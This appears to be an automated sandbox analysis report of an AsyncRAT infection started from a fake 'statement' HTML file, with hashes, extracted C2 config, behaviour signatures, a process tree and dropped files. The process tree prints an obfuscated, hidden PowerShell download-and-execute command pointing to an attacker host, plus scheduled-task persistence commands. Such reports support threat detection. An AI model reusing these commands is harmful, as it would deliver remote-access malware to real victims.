Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/07/2024, 14:00

General

  • Target

    Statment#5173642159.html

  • Size

    1KB

  • MD5

    1231d299fcd9917fde1326f9ef677361

  • SHA1

    f92479f63b0279c16e8499fe294e7b3d81da5942

  • SHA256

    e296925add362ceb26927e02439ad56accc8ce03b14712fbd4dd41377be036aa

  • SHA512

    0b76638bad3c2036c048b4b381a6192a14ed8770545d73ad8d49990ce30bd725b75fa721578e47cad8b946f63cc2e3681014acf72ba4af3598adba9e49345205

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Elsa3eed

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    https://pastebin.com/raw/C7vDhgZQ

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Statment#5173642159.html
    1⤵
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3500
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab55746f8,0x7ffab5574708,0x7ffab5574718
      2⤵
        PID:4660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        2⤵
          PID:3624
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2520
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
          2⤵
            PID:4916
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
            2⤵
              PID:212
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
              2⤵
                PID:672
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4932 /prefetch:8
                2⤵
                  PID:4584
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
                  2⤵
                    PID:2444
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
                    2⤵
                      PID:4436
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4824
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                      2⤵
                        PID:4704
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
                        2⤵
                          PID:2788
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5092
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
                          2⤵
                            PID:4864
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
                            2⤵
                              PID:1948
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2820
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2212
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4376
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "E:\Statment#386350474.wsf"
                                1⤵
                                • Blocklisted process makes network request
                                • Checks computer location settings
                                • Enumerates connected drives
                                PID:3600
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
                                  2⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1832
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
                                    3⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2872
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
                                    3⤵
                                      PID:2360
                                • C:\Windows\System32\WScript.exe
                                  C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
                                  1⤵
                                  • Checks computer location settings
                                  PID:4856
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4240
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                      3⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2876
                                • C:\Windows\System32\WScript.exe
                                  C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
                                  1⤵
                                  • Checks computer location settings
                                  PID:1496
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4040
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                      3⤵
                                        PID:2256
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                        3⤵
                                          PID:5056

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      3KB

                                      MD5

                                      f41839a3fe2888c8b3050197bc9a0a05

                                      SHA1

                                      0798941aaf7a53a11ea9ed589752890aee069729

                                      SHA256

                                      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

                                      SHA512

                                      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      210676dde5c0bd984dc057e2333e1075

                                      SHA1

                                      2d2f8c14ee48a2580f852db7ac605f81b5b1399a

                                      SHA256

                                      2a89d71b4ddd34734b16d91ebd8ea68b760f321baccdd4963f91b8d3507a3fb5

                                      SHA512

                                      aeb81804cac5b17a5d1e55327f62df7645e9bbbfa8cad1401e7382628341a939b7aedc749b2412c06174a9e3fcdd5248d6df9b5d3f56c53232d17e59277ab017

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      f4e6521c03f1bc16d91d99c059cc5424

                                      SHA1

                                      043665051c486192a6eefe6d0632cf34ae8e89ad

                                      SHA256

                                      7759c346539367b2f80e78abca170f09731caa169e3462f11eda84c3f1ca63d1

                                      SHA512

                                      0bb4f628da6d715910161439685052409be54435e192cb4105191472bb14a33724592df24686d1655e9ba9572bd3dff8f46e211c0310e16bfe2ac949c49fbc5e

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      b7c295462c702379bcd69d5ff104d688

                                      SHA1

                                      306f2d407faf0c868283e2a9700e14b5a7674671

                                      SHA256

                                      dddba0851a1ed97fabfc37bbbbf6a795119083acbb7e58de6c916b0c720cc34c

                                      SHA512

                                      bb9cd713e8de351dc18a8e8d517d384f552f341d246c280d6c5fa7bb2fa6bb2f9ee1b8cd25db33eee11ee52170669b5543653f99e26caf153d1481b549cffa67

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      867b10a42e54129af21688c25ae0f299

                                      SHA1

                                      67ab8815a20530bca25cf1401196415b3705da03

                                      SHA256

                                      17640dfa2e7d1b0ea491d686f2d420f4c90e2658ec2342d1bd7d07866b6f9593

                                      SHA512

                                      f19c321e0e815ccb9da4e5e320a4e9b9498056473135b6eb52e70b736897794a2fff492362d28bd5b2c57e3f2267c0989981d26358cdaaff8d45f3097383b02b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      11KB

                                      MD5

                                      dc09378287d1eae33d8f1ec412a3ced8

                                      SHA1

                                      658568168c28af1e80d1f5f889bef16411d47a02

                                      SHA256

                                      9e2f47c0d9ecc2c3a04361be490f817fcf3e99f3da8f440bcfddeb304c225364

                                      SHA512

                                      b584b5a268ed49d1a871502b668883d353dab2b301c9b68e45b65516f2a696cf373f435a553708f03494257514ea90407fc27233de1943de43f8cdcd26aaaca1

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      12KB

                                      MD5

                                      7640525a649803e7e666c0453ab2a35f

                                      SHA1

                                      8f4771d10d696fed6779329570c999a776e6bd44

                                      SHA256

                                      aff9d97949406813b21c6ff5e28c68587e55900e1b9134314893d9e0e9034dce

                                      SHA512

                                      1105045893f4dad094acb79194c563621a22f2601b3e3b6e8256be4e170d0d504febbe0632897590ecd87054ba9c8294c84a307ae3b3a364eadfc368405609f7

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      8b56ab7631860454473cf924d0e1da02

                                      SHA1

                                      cd3b8705f1008e1a2a19bd363ab0b291fd9ebd38

                                      SHA256

                                      5624dd2edd0d950b56787cd937043d9c43ad667ac5471090e21cc0d2313eaa18

                                      SHA512

                                      efe7cdf0dad52799a624c33878cacaca5bfeb08bc3fbb78cbdc768b92fa6c83e16b38dfd95a9fa4947d757b9ab276990fee02ae26abdea7b4fd32bf246c74f20

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      456bcc3f57826aa512563ed240ae114d

                                      SHA1

                                      9a139f1afdb517151cf977f75e0537e0365eb06d

                                      SHA256

                                      4d339a35670859c11e9c3d6a930fd38402a8dbb468aad3c7d773a3190c3cdc36

                                      SHA512

                                      a1366a65b6113c342186ab35befee0699fd4e83b66c79bee524d1248738ba9d874254c526d940e846823de13523171e49a0284aa6191327b078db545d3fe9e1f

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bt1b45sh.pav.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\Downloads\Unconfirmed 519947.crdownload

                                      Filesize

                                      1.4MB

                                      MD5

                                      556f847def0cd4a58a5c0b2bed7e167e

                                      SHA1

                                      35a79ffa7513c6bdd26582d1fa6efb3e00a49b16

                                      SHA256

                                      0a8a474a0b9c28bc7454f8cdfc547cd85972b0df75f3d6bf9f98689f9b310778

                                      SHA512

                                      2265fc3e51cc547f775fe35d8aaa4d7b102ccce15800a134530f20a869232c28a57ee1cfa21be0ecbd68dc27770312dfaba8e5aeca28913819b2e8abf5174bc5

                                    • C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml

                                      Filesize

                                      1KB

                                      MD5

                                      26913303151afee791eb652db6764fe2

                                      SHA1

                                      49418253140caeacb2a1b5bfac48f4bc8e8d5b24

                                      SHA256

                                      14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248

                                      SHA512

                                      5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

                                    • C:\Users\Public\Music\TvMusic.music

                                      Filesize

                                      452KB

                                      MD5

                                      6c396a8cfe36cbdc7eb72c2f6c8b2346

                                      SHA1

                                      6078599b7406607c848e56e162ea79a691a2aff4

                                      SHA256

                                      9f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8

                                      SHA512

                                      7a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b

                                    • C:\Users\Public\Music\TvMusic.vbs

                                      Filesize

                                      229B

                                      MD5

                                      66a1516e1d1e821084441211567d2e87

                                      SHA1

                                      0e688c9a93ad2cc162ef48ca75e0148e69d95ab1

                                      SHA256

                                      d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717

                                      SHA512

                                      1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12

                                    • memory/1832-125-0x000001A24CD80000-0x000001A24CDA2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/1832-167-0x000001A24D730000-0x000001A24D8F2000-memory.dmp

                                      Filesize

                                      1.8MB

                                    • memory/1832-168-0x000001A24DE30000-0x000001A24E358000-memory.dmp

                                      Filesize

                                      5.2MB

                                    • memory/2876-146-0x0000000000400000-0x0000000000416000-memory.dmp

                                      Filesize

                                      88KB

                                    • memory/2876-149-0x0000000004E90000-0x0000000004EF6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/2876-150-0x00000000052E0000-0x000000000537C000-memory.dmp

                                      Filesize

                                      624KB

                                    • memory/2876-151-0x0000000005B30000-0x00000000060D4000-memory.dmp

                                      Filesize

                                      5.6MB

                                    • memory/2876-152-0x0000000005880000-0x0000000005912000-memory.dmp

                                      Filesize

                                      584KB

                                    • memory/2876-153-0x00000000063E0000-0x00000000063EA000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/4240-145-0x000001C2A5D70000-0x000001C2A5D7C000-memory.dmp

                                      Filesize

                                      48KB